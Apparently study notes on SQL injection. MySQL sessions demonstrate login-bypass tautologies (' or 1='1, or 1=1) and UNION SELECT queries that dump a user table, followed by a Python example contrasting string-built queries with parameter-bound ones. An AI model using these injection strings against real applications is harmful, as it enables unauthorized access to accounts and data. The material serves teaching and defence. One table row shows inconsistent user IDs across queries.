php.ini configuration
magic_quotes_gpc = On
Universal password:
mysql> select * from user where username='wang' and password='123';
+--------+----------+----------+
| userid | username | password |
+--------+----------+----------+
| 1 | wang | 123 |
+--------+----------+----------+
1 row in set (0.00 sec)
mysql> select * from user where username='wang' and password='12';
Empty set (0.00 sec)
mysql> select * from user where username='wang' and password='aa' or 1='1';
+--------+----------+----------+
| userid | username | password |
+--------+----------+----------+
| 1 | wang | 123 |
| 2 | yong | 123 |
| 2 | ke | 321 |
+--------+----------+----------+
3 rows in set (0.01 sec)
mysql> select * from user where username='wa' and password='aa' or 1='1';
+--------+----------+----------+
| userid | username | password |
+--------+----------+----------+
| 1 | wang | 123 |
| 2 | yong | 123 |
| 2 | ke | 321 |
+--------+----------+----------+
3 rows in set (0.00 sec)
Universal username:
mysql> select * from user where username='sjdlf' or 1=1 ;
+--------+----------+----------+
| userid | username | password |
+--------+----------+----------+
| 1 | wang | 123 |
| 2 | yong | 123 |
| 2 | ke | 321 |
+--------+----------+----------+
3 rows in set (0.00 sec)
mysql> select * from user where username='sjdlf' or 1=1 and password='123';
+--------+----------+----------+
| userid | username | password |
+--------+----------+----------+
| 1 | wang | 123 |
| 2 | yong | 123 |
+--------+----------+----------+
2 rows in set (0.00 sec)
mysql> select * from user where username='wang' union select * from user where userid=2;
+--------+----------+----------+
| userid | username | password |
+--------+----------+----------+
| 1 | wang | 123 |
| 2 | yong | 123 |
+--------+----------+----------+
2 rows in set (0.00 sec)
mysql> select * from user where username='wang' union all select * from user where userid=2;
+--------+----------+----------+
| userid | username | password |
+--------+----------+----------+
| 1 | wang | 123 |
| 2 | yong | 123 |
+--------+----------+----------+
2 rows in set (0.00 sec)
mysql> select * from user where username='wang' and password='123' union all select * from user where userid=2;
+--------+----------+----------+
| userid | username | password |
+--------+----------+----------+
| 1 | wang | 123 |
| 2 | yong | 123 |
+--------+----------+----------+
2 rows in set (0.00 sec)
mysql> select * from user where username='wang' and password='123' union all select * from user;
+--------+----------+----------+
| userid | username | password |
+--------+----------+----------+
| 1 | wang | 123 |
| 1 | wang | 123 |
| 2 | yong | 123 |
| 3 | ke | 321 |
+--------+----------+----------+
4 rows in set (0.00 sec)
mysql> select * from user where username='wang' and password='123' union select * from user;
+--------+----------+----------+
| userid | username | password |
+--------+----------+----------+
| 1 | wang | 123 |
| 2 | yong | 123 |
| 3 | ke | 321 |
+--------+----------+----------+
3 rows in set (0.00 sec)
mysql> select * from user where username='wang' and password='321' union select * from user;
+--------+----------+----------+
| userid | username | password |
+--------+----------+----------+
| 1 | wang | 123 |
| 2 | yong | 123 |
| 3 | ke | 321 |
+--------+----------+----------+
3 rows in set (0.00 sec)
mysql> select * from user where username='wd' and password='321' union select * from user;
+--------+----------+----------+
| userid | username | password |
+--------+----------+----------+
| 1 | wang | 123 |
| 2 | yong | 123 |
| 3 | ke | 321 |
+--------+----------+----------+
3 rows in set (0.00 sec)
mysql>
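
The sessions above, replayed as an added example (not part of the original notes): the same `user` table in an in-memory SQLite database, with a string-built login query beside a parameter-bound one. The function names, the constant and the SQLite backend are assumptions made for the example; the page itself uses MySQL.

```python
import sqlite3

# Constructed copy of the page's `user` table (same three rows). Plaintext
# passwords mirror the page; a real system stores password hashes.
ROWS = [(1, "wang", "123"), (2, "yong", "123"), (3, "ke", "321")]

# The page's `aa' or 1='1` written with string operands, because SQLite
# (unlike MySQL) does not coerce the comparison 1 = '1' to true.
TAUTOLOGY = "aa' or '1'='1"

def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user (userid INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO user VALUES (?, ?, ?)", ROWS)
    return conn

def login_concat(conn, username, password):
    """Vulnerable form: input is pasted into the SQL text, as in the sessions above."""
    sql = ("SELECT userid, username FROM user "
           "WHERE username='%s' AND password='%s'" % (username, password))
    return conn.execute(sql).fetchall()

def login_bound(conn, username, password):
    """Hardened form: values travel as bound parameters, never as SQL text."""
    sql = "SELECT userid, username FROM user WHERE username=? AND password=?"
    rows = conn.execute(sql, (username, password)).fetchall()
    # Accept only a single, unambiguous match for the requested account.
    return rows if len(rows) == 1 and rows[0][1] == username else []

def precedence_demo(conn):
    """AND binds tighter than OR, so the WHERE clause reads a OR (b AND c).
    That is why the page's `or 1=1 and password='123'` query returns two rows."""
    sql = ("SELECT username FROM user "
           "WHERE username='sjdlf' OR 1=1 AND password='123'")
    return [r[0] for r in conn.execute(sql)]

if __name__ == "__main__":
    db = make_db()
    print("concat, valid login :", login_concat(db, "wang", "123"))
    print("concat, tautology   :", login_concat(db, "wa", TAUTOLOGY))
    print("bound,  tautology   :", login_bound(db, "wa", TAUTOLOGY))
    print("bound,  valid login :", login_bound(db, "wang", "123"))
    print("precedence          :", precedence_demo(db))
```

`magic_quotes_gpc` was removed in PHP 5.4.0, so bound parameters, not quote escaping, are the control to rely on.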